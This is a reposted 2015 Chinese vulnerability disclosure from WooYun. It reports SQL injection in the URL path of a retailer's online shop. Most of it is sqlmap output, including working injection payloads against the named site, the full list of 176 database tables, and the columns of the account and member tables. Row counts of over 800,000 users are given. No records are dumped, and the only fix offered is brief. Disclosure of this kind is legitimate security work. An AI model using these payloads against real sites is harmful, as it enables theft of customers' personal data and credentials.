记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

来伊份官方商城某处SQL注入可致80W+用户数据泄露

2015-01-03 13:35

注入点说明:(星号部分为注入点)

code 区域
GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1

Referer: http://www.laiyifen.com:80/

Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310

Host: www.laiyifen.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



current user: 'laiyifendb@10.3.%.%'



current database: 'laiyifendb'



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



available databases [3]:

[*] information_schema

[*] laiyifendb

[*] test



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



Database: laiyifendb

[176 tables]

+-----------------------------------------+

| app_default_info |

| awardlist |

| awardlist_copy |

| collect_shop |

| ds_0303_add |

| ds_0303_payment |

| ds_0303_ptype |

| ds_0303_rpcpoll |

| ds_ectools_analysis_logs |

| ds_ectools_analysis_logs_2 |

| ds_guajian_1 |

| luck_log |

| luck_log_mobile |

| member_lucknum |

| mobile_promotion_goods |

| moblie_luck_num |

| sdb_aftersales_return_product |

| sdb_authenticator_clients |

| sdb_authenticator_logs |

| sdb_authenticator_requestlist |

| sdb_b2c_bcompany |

| sdb_b2c_brand |

| sdb_b2c_cart |

| sdb_b2c_cart_objects |

| sdb_b2c_comment_goods_point |

| sdb_b2c_comment_goods_type |

| sdb_b2c_counter |

| sdb_b2c_counter_attach |

| sdb_b2c_coupons |

| sdb_b2c_delivery |

| sdb_b2c_delivery_items |

| sdb_b2c_dly_h_area |

| sdb_b2c_dlycorp |

| sdb_b2c_dlytype |

| sdb_b2c_ecpool |

| sdb_b2c_ecpool_mobile |

| sdb_b2c_excard_rule |

| sdb_b2c_excard_used |

| sdb_b2c_fbtad |

| sdb_b2c_goods |

| sdb_b2c_goods_cat |

| sdb_b2c_goods_keywords |

| sdb_b2c_goods_lv_price |

| sdb_b2c_goods_promotion_ref |

| sdb_b2c_goods_rate |

| sdb_b2c_goods_spec_index |

| sdb_b2c_goods_type |

| sdb_b2c_goods_type_props |

| sdb_b2c_goods_type_props_value |

| sdb_b2c_goods_type_spec |

| sdb_b2c_goods_virtual_cat |

| sdb_b2c_history_orders |

| sdb_b2c_history_products |

| sdb_b2c_huodong_log |

| sdb_b2c_huodongda |

| sdb_b2c_jiang |

| sdb_b2c_jiang_huodong |

| sdb_b2c_jiang_log |

| sdb_b2c_jiang_members |

| sdb_b2c_lulu_card |

| sdb_b2c_member_addrs |

| sdb_b2c_member_advance |

| sdb_b2c_member_comments |

| sdb_b2c_member_coupon |

| sdb_b2c_member_goods |

| sdb_b2c_member_lv |

| sdb_b2c_member_msg |

| sdb_b2c_member_point |

| sdb_b2c_member_pwdlog |

| sdb_b2c_member_systmpl |

| sdb_b2c_members |

| sdb_b2c_meng_buy_1 |

| sdb_b2c_meng_good_gift |

| sdb_b2c_meng_luck_reg |

| sdb_b2c_meng_send |

| sdb_b2c_order_coupon_user |

| sdb_b2c_order_delivery |

| sdb_b2c_order_items |

| sdb_b2c_order_log |

| sdb_b2c_order_objects |

| sdb_b2c_order_pmt |

| sdb_b2c_orders |

| sdb_b2c_products |

| sdb_b2c_recharge_log |

| sdb_b2c_reship |

| sdb_b2c_reship_items |

| sdb_b2c_sales_baifendian |

| sdb_b2c_sales_bangdingsp |

| sdb_b2c_sales_freeShipping |

| sdb_b2c_sales_rule_goods |

| sdb_b2c_sales_rule_order |

| sdb_b2c_sell_logs |

| sdb_b2c_shop |

| sdb_b2c_single |

| sdb_b2c_spec_values |

| sdb_b2c_specification |

| sdb_b2c_type_brand |

| sdb_b2copenapi_api_fail |

| sdb_b2copenapi_api_log |

| sdb_b2copenapi_api_log_copy |

| sdb_b2copenapi_api_mobile_logs |

| sdb_b2copenapi_request_shops |

| sdb_base_app_content |

| sdb_base_apps |

| sdb_base_cache_expires |

| sdb_base_files |

| sdb_base_kvstore |

| sdb_base_network |

| sdb_base_queue |

| sdb_base_rpcnotify |

| sdb_base_rpcpoll |

| sdb_base_task |

| sdb_content_article_bodys |

| sdb_content_article_indexs |

| sdb_content_article_nodes |

| sdb_couponlog_order_coupon_ref |

| sdb_couponlog_order_coupon_user |

| sdb_dbeav_meta_register |

| sdb_dbeav_meta_value_datetime |

| sdb_dbeav_meta_value_decimal |

| sdb_dbeav_meta_value_int |

| sdb_dbeav_meta_value_longtext |

| sdb_dbeav_meta_value_text |

| sdb_dbeav_meta_value_varchar |

| sdb_dbeav_recycle |

| sdb_desktop_filter |

| sdb_desktop_flow |

| sdb_desktop_hasrole |

| sdb_desktop_menus |

| sdb_desktop_recycle |

| sdb_desktop_role_flow |

| sdb_desktop_roles |

| sdb_desktop_tag |

| sdb_desktop_tag_rel |

| sdb_desktop_user_flow |

| sdb_desktop_users |

| sdb_ectools_analysis |

| sdb_ectools_analysis_logs |

| sdb_ectools_currency |

| sdb_ectools_order_bills |

| sdb_ectools_payments |

| sdb_ectools_refunds |

| sdb_ectools_regions |

| sdb_gift_cat |

| sdb_gift_ref |

| sdb_giftpackage_giftpackage |

| sdb_giftpackage_order_ref |

| sdb_image_image |

| sdb_image_image_attach |

| sdb_operatorlogmanage_logs |

| sdb_operatorlogmanage_register |

| sdb_pam_account |

| sdb_pam_auth |

| sdb_pam_log |

| sdb_pointprofessional_member_point_task |

| sdb_recommended_goods |

| sdb_recommended_goods_period |

| sdb_search_search |

| sdb_site_explorers |

| sdb_site_link |

| sdb_site_menus |

| sdb_site_modules |

| sdb_site_route_statics |

| sdb_site_seo |

| sdb_site_themes |

| sdb_site_themes_tmpl |

| sdb_site_widgets |

| sdb_site_widgets_instance |

| sdb_site_widgets_proinstance |

| sdb_timedbuy_objitems |

| shoplist |

| swjiang_contect |

| swjiang_contect_copy |

| tbasarea |

| tbaschildarea |

| tbasthirdarea |

+-----------------------------------------+



code 区域
Database: laiyifendb

Table: sdb_pam_account

[9 columns]

+----------------+-----------------------+

| Column | Type |

+----------------+-----------------------+

| account_id | mediumint(8) unsigned |

| account_type | varchar(30) |

| createtime | int(10) unsigned |

| disabled | enum('true','false') |

| hmlogin | enum('false','true') |

| hmupdate | enum('0','1') |

| login_name | varchar(100) |

| login_password | varchar(32) |

| openlogin | varchar(60) |

+----------------+-----------------------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



Database: laiyifendb

+-----------------+---------+

| Table | Entries |

+-----------------+---------+

| sdb_pam_account | 805856 |

+-----------------+---------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



Database: laiyifendb

Table: sdb_b2c_members

[70 columns]

+----------------+-----------------------+

| Column | Type |

+----------------+-----------------------+

| addon | longtext |

| addr | varchar(255) |

| advance | decimal(20,3) |

| advance_freeze | decimal(20,3) |

| anyolife_uname | varchar(100) |

| area | varchar(255) |

| b_day | tinyint(3) unsigned |

| b_month | tinyint(3) unsigned |

| b_year | smallint(5) unsigned |

| bind_time | int(10) unsigned |

| biz_money | decimal(20,3) |

| card_no | varchar(20) |

| card_type | varchar(45) |

| cert_no | varchar(100) |

| cert_type | varchar(200) |

| cur | varchar(20) |

| custom | longtext |

| disabled | enum('true','false') |

| education | varchar(45) |

| email | varchar(200) |

| end_date | int(10) unsigned |

| experience | int(10) |

| family_mem | varchar(45) |

| fav_tags | longtext |

| firstname | varchar(50) |

| foreign_id | varchar(255) |

| interest | longtext |

| is_card | enum('0','1') |

| is_upload | enum('0','1') |

| job | varchar(200) |

| lang | varchar(20) |

| last_loginip | varchar(16) |

| last_logintime | int(10) unsigned |

| lastname | varchar(50) |

| login_count | int(11) |

| login_source | varchar(45) |

| member_id | mediumint(8) unsigned |

| member_lv_id | mediumint(8) unsigned |

| member_refer | varchar(50) |

| mobile | varchar(30) |

| month_income | varchar(45) |

| name | varchar(50) |

| nation | varchar(45) |

| order_num | mediumint(8) unsigned |

| pay_time | mediumint(8) unsigned |

| point | int(10) |

| point_freeze | mediumint(8) unsigned |

| point_history | mediumint(8) unsigned |

| refer_id | varchar(50) |

| refer_url | varchar(200) |

| reg_ip | varchar(16) |

| reg_source | varchar(45) |

| regtime | int(10) unsigned |

| remark | text |

| remark_type | varchar(2) |

| score_rate | decimal(5,3) |

| sex | enum('0','1','2') |

| state | tinyint(1) |

| sum_pointtotal | decimal(20,3) |

| tel | varchar(30) |

| unreadmsg | smallint(5) unsigned |

| use_total | decimal(20,3) |

| vipapply_no | varchar(45) |

| vipapply_time | int(10) unsigned |

| vipcard_no | varchar(45) |

| vipcard_pwd | varchar(45) |

| vipinfo_no | varchar(20) |

| vocation | varchar(50) |

| wedlock | enum('0','1') |

| zip | varchar(20) |

+----------------+-----------------------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



Database: laiyifendb

+-----------------+---------+

| Table | Entries |

+-----------------+---------+

| sdb_b2c_members | 805876 |

+-----------------+---------+





具体数据我就不dump了。

修复方案:

加强参数过滤。

知识来源: www.wooyun.org/bugs/wooyun-2015-083795

阅读:128082 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“来伊份官方商城某处SQL注入可致80W+用户数据泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云